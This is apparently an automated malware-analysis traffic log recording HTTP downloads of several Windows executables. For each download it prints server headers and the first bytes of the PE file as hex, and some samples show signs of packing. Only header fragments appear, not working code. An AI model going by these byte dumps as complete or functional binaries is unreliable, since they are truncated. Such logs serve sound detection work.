00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 22 Nov 2024 19:35:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 22 Nov 2024 19:35:30 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 22 Nov 2024 19:35:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 22 Nov 2024 19:35:36 GMTContent-Type: application/octet-streamContent-Length: 1881600Last-Modified: Fri, 22 Nov 2024 19:33:15 GMTConnection: keep-aliveETag: "6740dc7b-1cb600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4b 00 00 04 00 00 0c 05 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 b6 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 b6 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 90 06 00 00 06 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 2a 00 00 b0 06 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 72 77 66 74 67 69 77 00 a0 19 00 00 20 31 00 00 98 19 00 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 61 6a 67 66 73 78 6c 00 10 00 00 00 c0 4a 00 00 04 00 00 00 90 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 4a 00 00 22 00 00 00 94 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 22 Nov 2024 19:36:10 GMTContent-Type: application/octet-streamContent-Length: 4419072Last-Modified: Fri, 22 Nov 2024 17:40:31 GMTConnection: keep-aliveETag: "6740c20f-436e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e9 85 3c 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 fc 49 00 00 96 73 00 00 32 00 00 00 f0 c5 00 00 10 00 00 00 10 4a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 c6 00 00 04 00 00 27 dc 43 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 00 71 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 da c5 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 da c5 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 e0 70 00 00 10 00 00 00 78 27 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 f0 70 00 00 00 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 00 71 00 00 02 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 39 00 00 10 71 00 00 02 00 00 00 8a 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 67 72 63 64 6a 63 69 00 c0 1b 00 00 20 aa 00 00 bc 1b 00 00 8c 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 65 7a 72 61 76 69 76 00 10 00 00 00 e0 c5 00 00 04 00 00 00 48 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 c5 00 00 22 00 00 00 4c 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 22 Nov 2024 19:36:23 GMTContent-Type: application/octet-streamContent-Length: 1856000Last-Modified: Fri, 22 Nov 2024 19:33:01 GMTConnection: keep-aliveETag: "6740dc6d-1c5200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 51 3c 3f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 0a 04 00 00 c2 00 00 00 00 00 00 00 70 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 49 00 00 04 00 00 d4 df 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 80 05 00 70 00 00 00 00 70 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 60 05 00 00 10 00 00 00 62 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 70 05 00 00 02 00 00 00 72 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 05 00 00 02 00 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2a 00 00 90 05 00 00 02 00 00 00 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 63 6b 67 73 6d 72 69 00 c0 19 00 00 a0 2f 00 00 b4 19 00 00 78 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 6f 64 77 61 73 61 71 00 10 00 00 00 60 49 00 00 04 00 00 00 2c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 49 00 00 22 00 00 00 30 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 22 Nov 2024 19:36:32 GMTContent-Type: application/octet-streamContent-Length: 1789440Last-Modified: Fri, 22 Nov 2024 19:33:08 GMTConnection: keep-aliveETag: "6740dc74-1b4e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 24 01 00 00 00 00 00 00 50 68 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 68 00 00 04 00 00 be 99 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 29 00 00 c0 24 00 00 02 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 6b 72 6d 71 77 68 6f 00 b0 19 00 00 90 4e 00 00 b0 19 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 7a 78 78 70 76 6d 6d 00 10 00 00 00 40 68 00 00 04 00 00 00 28 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 68 00 00 22 00 00 00 2c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
